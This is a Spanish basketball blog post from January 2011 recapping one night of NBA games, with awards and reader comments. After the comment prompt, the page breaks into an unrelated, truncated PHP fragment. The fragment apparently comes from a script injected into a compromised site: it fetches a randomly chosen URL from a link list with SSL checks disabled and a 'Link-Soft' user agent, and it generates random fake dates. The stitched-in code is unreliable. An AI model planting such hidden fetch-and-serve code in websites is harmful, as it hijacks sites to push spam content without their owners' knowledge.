La crónica (20/01/2011)

21 de January de 2011 por Viva_Dirk

En esta jornada corta, como corresponde a cada jueves, no vimos a ninguno de los cocos de la liga pero sí a algunas de las sensaciones de la temporada.

Derrick Rose machacó a unos tristísimos Mavs, que han hecho regresar a Nowitzki antes de lo normal por pura falta de efectivos (de hecho, así se explica que se hayan comprometido con Peja Stojakovic), aunque algo de mérito habrá que darle al gurú defensivo que ahora dirige a los Bulls, el Sr.Thibbodeau.

Los Bobcats vencieron a los Sixers con una gran actuación de DJ Augustine, en un partido igualadísimo en el que ninguno de los equipos acabó un cuarto con una ventaja mayor a 3 puntos, de modo que los de Charlotte amarraron la victoria aprovechando la renta de 6 puntos que se llevaron al descanso.

En el gran duelo entre LaMarcus Aldridge y Blake Griffin el primero se llevó el choque y superó al rookie de cara al aro, mientras Griffin volvió a coquetear con los 20 rebotes. Y mientras estos dos se retaban por dentro, Eric Gordon y Wes Matthews ametrallaron el aro desde el perímetro.

PREMIOS

MVP: La pareja Matthews & Aldridge sumó 56 puntos, 11 rebotes y 8 asistencias con un 60% de acierto, difícil hueso se encontraron los Clippers. Rose, con 26 puntos, 7 rebotes y 9 asistencias, y DJ Augustin, con 31 puntos, 4 rebotes y 8 asistencias, son los otros candidatos.griffdunk

Rookie: Griffin, en su mundo. Anoche, 20 puntos y 18 rebotes, aunque sí mostró ser humano en sus porcentajes de tiro.

Sorpresa: Aunque lleve un tiempo haciéndolo no deja de sorprender la facilidad con la que Wes Matthews ha asumido el papel de Brandon Roy. Los 15 puntos y 7 rebotes de Mohammed también merecen nuestra atención.

Decepción: 77 puntos con un 35% en tiros de campo registraron ayer los Dallas Mavericks, que de nuevo alinearon a Pavlovic en el quinteto inicial. Mala pinta la suya.

MEV: Otra pareja, la formada por Eric Gordon y Blake Griffin, sumó 55 puntos, 23 rebotes y 8 asistencias (también 8 pérdidas). Además el escolta se lució con un bestial 7 de 11 desde la línea de 3. Son el futuro de los Clippers… que dios les pille confesaos.

Comenta

4 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Va mejorando Rudy. Vale que no merece salir aquí todos los dias como la clave de la recuperacion de Portland, pero es cierto que se complementa con Mathews para llegar a las estadisticas de Roy.

      Citar

  2. MagicJohnson32 dice:
    #2

    Yo voy a insistir en lo que ya dijo aquí Viva hace unos días: el temporadón de LaMarcus. Especialmente el mes de enero que se está marcando es brutal, 27 puntos, 10 rebotes, 2.5 asistencias, 1 robo, 53% fg.

      Citar

  3. Denise dice:
    #3

    Stojakovic a los Mavs. No creo que mejore mucho al equipo, salvo algún día puntual en el que pille una racha propia de los tiradores y enchufe 4 triples en un ratillo.

      Citar

  4. Rompe dice:
    #4

    Como curiosidad decir que los Spurs están en un 86% de victorias, por encima de las famosas 70 victorias de los Bulls, 85%…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>